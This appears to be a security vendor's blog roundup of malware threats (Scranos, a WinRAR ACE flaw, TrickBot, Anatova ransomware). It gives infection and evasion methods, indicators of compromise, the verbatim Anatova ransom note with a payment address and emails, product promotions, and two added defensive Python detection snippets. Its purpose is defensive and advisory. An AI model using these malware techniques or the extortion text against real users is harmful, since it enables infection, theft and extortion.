  • stealing information from various online platforms
  • modules that inject various false advertisement
  • bitcoin miners

In addition, Scranos has the capability to infect other operating systems such as Linux, iOS, and Android. These targets can be infected through phishing messages sent from infected users’ Facebook accounts.

Who is affected?

Scranos, due to its infection methods, can affect anyone, even those who do not download illegal software. While Scranos was active in a testing form in several regions, it has been seen on a global scale in recent months, indicating either that testing is complete or that the operators are now testing on a larger scale. Either way, Scranos seems to just be getting started, and everyone is at risk.

Indicators of compromise

  1. YouTube or Facebook accounts showing activity during times it was not used
  2. %WINDIR%\System32\<random looking names>
  3. wcrx.exe
  4. Chrome extensions that the user didn’t install
  5. Y2B.EXE
  6. HKCU\Software\@demo
  7. HKLM\Software\Microsoft\@msver1
  8. HKLM\Software\Microsoft\@msver2
  9. HKLM\Software\Microsoft\@o2
  10. HKLM\Software\Microsoft\@o3

What you can do


If you or someone you know is infected with Scranos malware, download SUPERAntiSpyware Professional right now and get a 14-day free trial, no credit card required. SUPERAntiSpyware is easy to install and will detect and remove Scranos from any Windows computer. If you are a Computer Technician, you may like to try our SUPERAntiSpyware Tech Edition solution, now free for the next 30 days. Use Tech04 as the Tech ID. Click here: https://www.superantispyware.com/technician-download.html

WinRAR Vulnerability

File compression has been an indispensable tool for computer users ever since it was first developed in the late 1980s. Back then, space on relatively small hard drives was at a premium, and compacting files that weren’t currently being used was a great way to free up a few valuable megabytes. These archived files also transferred faster over the slow, newborn internet.

Today there are many varieties of file compression: Zip, Gzip, RAR, 7z to name a few. WinRAR is a utility that allows you to compress/decompress most of the more common compressed file types, and many less-used types.

One of these lesser-used file types is called ACE. Recently a vulnerability has been found in WinRAR that can allow a malicious ACE archive to drop malware onto your system. This flaw has been present in WinRAR for 19 years but was just noticed earlier this year.

WinRAR’s developers have since patched the software with the release of version 5.70, but unfortunately WinRAR does not automatically check for updates. This means that there are millions of users out there with older versions of the software on their machines, just waiting to be attacked.

Social engineering tactics have been used with these malicious archives, with adult photos or mp3s displayed inside them to entice the user to open the compressed file thereby infecting their system. Backdoors seem to be a common payload distributed by this process.

SUPERAntiSpyware can help protect you from many of the malware variants that have been distributed through this method. Along with keeping SUPERAntiSpyware’s definition database up-to-date, we recommend updating WinRAR to version 5.70 just to be safe.

TrickBot

TrickBot is once again making itself known during tax season and attempting to steal your hard-earned money. TrickBot was originally discovered in October of 2016 but has since changed and evolved dramatically into one of the most prolific hacking attacks today.

How it works

Just like Emotet, TrickBot primarily spreads through specially designed emails, or malspam, that attempt to trick the user into clicking a link or downloading the attachment. The current campaign, as of this writing, is TrickBot’s usual tax season attack: pretending to be the IRS. In the example below, the link sends you to a domain that looks official but is slightly misspelled.

Once TrickBot is installed on a computer, it sets up a scheduled task to make sure it has a persistent presence on the computer before starting to steal information. In addition, it disables Windows Defender early on so that it won’t be removed. SUPERAntiSpyware is not stopped in this way.

TrickBot does not show any signs of running on a user’s computer and the only “noise” it makes is the network traffic it creates. Recording network traffic is generally only done by businesses, which helps TrickBot evade detection on personal computers.

TrickBot uses a modular design, much like Emotet and other bankers. Not only does this allow TrickBot to quickly change its attack capabilities, but it also makes it harder to detect. These modules often do one thing well rather than trying to do many things. Some are designed to go after hosted FTP servers, cached remote desktop credentials, and bitcoin mining accounts.

The most common module, however, allows TrickBot to redirect the user to fake bank sites that, instead of logging the user in, will steal account credentials. The scammers make this possible by domain squatting, or registering an internet address that is only slightly different than the one you intend to visit. For instance, if you receive an email about your GoDaddy account, you might not notice if a link in that email goes to godabdy.com/payyourbill (godaddy is misspelled with a b instead of the second d).

This is compounded by hiding the URL, so that only the studious will look for it, and by making the site look exactly as you expect through careful recreation by the attackers. Many big companies attempt to combat this by buying these lookalike domains and redirecting them to the appropriate site, but this is not always easily done.
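One defensive check for the domain-squatting trick described above, as an added example that is not part of the original post: it compares a link's host against a constructed allow-list of domains the recipient actually uses and flags near-miss spellings (such as godabdy.com) as well as a real domain buried inside a longer attacker-controlled host. The allow-list and sample links are assumptions made for the illustration.

```python
from urllib.parse import urlparse

# Constructed allow-list: the domains this recipient really has accounts with.
TRUSTED_DOMAINS = ("godaddy.com", "irs.gov", "paypal.com")


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance: number of insertions, deletions and substitutions."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                 # delete ca
                           cur[j - 1] + 1,              # insert cb
                           prev[j - 1] + (ca != cb)))   # substitute ca -> cb
        prev = cur
    return prev[-1]


def link_host(url: str) -> str:
    """Lower-cased host of a link (scheme optional) with any leading 'www.' removed."""
    if "://" not in url:
        url = "http://" + url
    host = (urlparse(url).hostname or "").lower()
    return host[4:] if host.startswith("www.") else host


def classify_link(url: str, trusted=TRUSTED_DOMAINS, max_edits: int = 2) -> str:
    """Return 'trusted', 'lookalike' or 'unrelated' for the link's host."""
    host = link_host(url)
    if not host:
        return "unrelated"
    # The real domain itself, or a subdomain of it (account.godaddy.com).
    if host in trusted or any(host.endswith("." + d) for d in trusted):
        return "trusted"
    labels = host.split(".")
    for d in trusted:
        # Near-miss spelling of the whole domain, e.g. godabdy.com for godaddy.com.
        if edit_distance(host, d) <= max_edits:
            return "lookalike"
        # The real domain appearing as a label run inside a longer host,
        # e.g. godaddy.com.evil.example, which is not under godaddy.com at all.
        dl = d.split(".")
        if any(labels[i:i + len(dl)] == dl for i in range(len(labels) - len(dl) + 1)):
            return "lookalike"
    return "unrelated"


if __name__ == "__main__":
    for link in ("godabdy.com/payyourbill", "https://www.godaddy.com/",
                 "https://godaddy.com.evil.example/login", "https://example.org/"):
        print(link, "->", classify_link(link))
```

A short allow-list with very short domains will produce more near-miss hits, so tune max_edits to the domain lengths you actually protect.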

Who is affected?

TrickBot is aimed more at business than casual users; however, it is still the number-one banker, and anyone who lives inside the USA, Africa, Europe, and Middle East should be wary. (This does not exclude other areas from being hit, just shows that they are not the current target.)

Indicators of Compromise

  1. C:\Documents and Settings\<USER>\Application Data\Microsoft\Crypto\RSA\S-1-5-21-1275210071-920026266-1060284298-1003\8c8436195f6e0875edb85e34665c32ec_fabbc6a1-c573-4ea0-9ca1-50004b35a440
  2. C:\d2cc298a90c6ef939488b53ead12fd3549c3c0414733f6fdaf1762da31ea1e90
  3. sha256: d2cc298a90c6ef939488b53ead12fd3549c3c0414733f6fdaf1762da31ea1e90
  4. sha1: df404c6b1efc2cfbfdd0b7699554989dab03791f
  5. md5: e580ca34929cf9b62e816adcebe715f2
  6. C:\Users\admin\AppData\Roaming\msscsc\e690ca34929cf9b72e917adcebe816f2.exe
  7. d2cc298a90c6ef939488b53ead12fd3549c3c0414733f6fdaf1762da31ea1e90
  8. http://ip.anysrc.net/plain/clientip
  9. Scheduled Task that points to a file in AppData such as C:\Users\<User>\AppData\Roaming\
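The scheduled-task persistence described under “How it works” and indicator 9 above can be checked with a small script, added here as an example that is not part of the original post: it parses a Windows task definition (the XML files stored under the Tasks folder) and reports any Exec action whose command launches from a user's AppData directory. The two task definitions below are constructed samples; the first reuses the AppData path from indicator 6, the second is a benign placeholder.

```python
import re
import xml.etree.ElementTree as ET

# Launch locations a legitimate installer rarely schedules tasks from: a user's
# roaming or local profile, written either expanded or as an environment variable.
USER_PROFILE_PATH = re.compile(
    r"\\AppData\\(Roaming|Local)\\|%(APPDATA|LOCALAPPDATA)%", re.IGNORECASE)


def _local(tag: str) -> str:
    """Strip the XML namespace prefix from an element tag."""
    return tag.rsplit("}", 1)[-1]


def task_commands(task_xml: str) -> list:
    """Return every <Command> path from the task's <Exec> actions, unquoted."""
    root = ET.fromstring(task_xml)
    return [el.text.strip().strip('"') for el in root.iter()
            if _local(el.tag) == "Command" and el.text]


def suspicious_commands(task_xml: str) -> list:
    """Return the task's commands that launch from a user profile directory."""
    return [cmd for cmd in task_commands(task_xml) if USER_PROFILE_PATH.search(cmd)]


# Constructed sample: a logon task pointing at the AppData path from the IoC list.
TRICKBOT_LIKE_TASK = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>C:\\Users\\admin\\AppData\\Roaming\\msscsc\\e690ca34929cf9b72e917adcebe816f2.exe</Command>
    </Exec>
  </Actions>
</Task>"""

# Constructed sample: a task launching from Program Files, which the check leaves alone.
BENIGN_TASK = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Actions Context="Author">
    <Exec>
      <Command>"C:\\Program Files\\Example Updater\\updater.exe"</Command>
      <Arguments>/check</Arguments>
    </Exec>
  </Actions>
</Task>"""

if __name__ == "__main__":
    for name, xml in (("trickbot-like", TRICKBOT_LIKE_TASK), ("benign", BENIGN_TASK)):
        print(name, "->", suspicious_commands(xml))
```

On a live system the same function can be run over each file under the Windows Tasks directory; task files there are UTF-16, so read them as bytes before handing them to the parser.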

What you can do


If you or someone you know is infected with TrickBot malware, download SUPERAntiSpyware Professional right now and get a 14-day free trial, no credit card required. SUPERAntiSpyware is easy to install and will detect and remove TrickBot from any Windows computer. If you are a Computer Technician, you may like to try our SUPERAntiSpyware Tech Edition solution, now free for the next 30 days. Use Tech04 as the Tech ID. Click here: https://www.superantispyware.com/technician-download.html

Anatova

Anatova is the nickname given to a new brand of sophisticated ransomware that looks to encrypt your personal or business files and then demands payment to decipher them.

How it works

Anatova is distributed through peer-to-peer (P2P) file sharing networks. It masquerades as genuine software, often using real icons to fool users into believing it is authentic. Once you run the malicious software, it begins to encrypt your personal documents, after which it will demand you send payment to regain access to your files.

This can be extremely hazardous for larger organizations, since Anatova can affect files across local networks. The ransomware is designed to encrypt files quickly to avoid detection: it fully encrypts files smaller than 1 Megabyte, and encrypts only the first Megabyte of files larger than that. Even though the larger files are not completely encrypted, enough damage has been done that they are, most likely, no longer usable.

Another fascinating thing about Anatova is its resistance to analysis. It encrypts most of its internal strings, cleans its own data out of memory, causes bugs in common analysis programs, and stops execution if it detects that it is in a virtual or test environment.

One of the most dangerous aspects of Anatova is the fact that it is built to be modular. This means that it was designed to have new features added to it at any time. Instead of just encrypting your files, future versions of Anatova could steal your personal info and passwords, add your computer to a malicious botnet, or a multitude of other things.

Who is affected

Due to its current distribution method, most people who do not use peer-to-peer file sharing should be safe from this threat. If you do happen to use P2P file sharing, we strongly suggest you scan every file you download before opening it, both with SUPERAntiSpyware and VirusTotal.

The majority of Anatova detections have been in the United States, although infections have been seen across Europe as well. This malware checks your system language and refuses to run in several countries such as Iraq, India, and the Commonwealth of Independent States.

Indicators of compromise

Generally one of the biggest indicators of a ransomware attack is the changed extensions on the encrypted files. This ransomware, however, does not alter the file extensions, which makes casual detection of an Anatova infection more difficult.

A better indicator is the ransom note that this malware leaves behind. Anatova will drop a text file into each folder where it has encrypted a file. This text file gives instructions on how to pay the ransom to get your files unlocked:

All your files are crypted. Only us can decrypt your files, you need to pay 10 DASH in the address:

XnzvWQKv22uPDCYcuGebyoaVinekkJicbK

After the payment send us the address used to make the payment to one of these mail addresses:

anatova2@tutanota.com

anatoday@tutanota.com

Later wait for our reply with your decryptor. If you want to send us ONE JPG FILE ONLY max 200kb to decrypt per free before of payment

Don’t try fuck us, in this case you NEVER will recover your files. Nothing personal, only business.

Send this file untouched with your payment or/and free file!

—KEY—

<random key>

—KEY—

What you can do

SUPERAntiSpyware detects many variants of Anatova; however, new versions are being created all the time so make sure to always update to the latest database version. Also, upgrading to Real-Time protection will dramatically increase your level of protection from this threat.

Refraining from using Anatova’s primary infection vector — peer-to-peer file sharing services — should effectively keep your system safe from this infection. As stated before, if you do use P2P file sharing services, you must be extremely careful with what you download. Make sure to scan every file with SUPERAntiSpyware and VirusTotal to ensure it is safe before opening it.

How To Remove Anatova

  1. Using an uninfected system, search the internet for a decryptor for your particular version of Anatova and copy it to a USB drive — I would suggest starting your search with No More Ransom.
  2. Restart the infected computer in Safe Mode with Networking.
  3. Insert the USB drive with the decryptor, copy it to the desktop, then eject and remove the drive.
  4. Run the decryptor.
  5. Assuming the decryptor is successful, update your SUPERAntiSpyware to the latest database version and run a complete scan to remove any traces of Anatova from your system.
  6. If the decryptor does not work, you can take your computer to a data recovery expert.